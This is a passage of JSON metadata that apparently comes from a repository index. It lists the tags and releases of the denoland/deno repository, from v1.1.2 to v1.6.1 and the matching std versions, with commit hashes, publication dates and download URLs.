d180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/st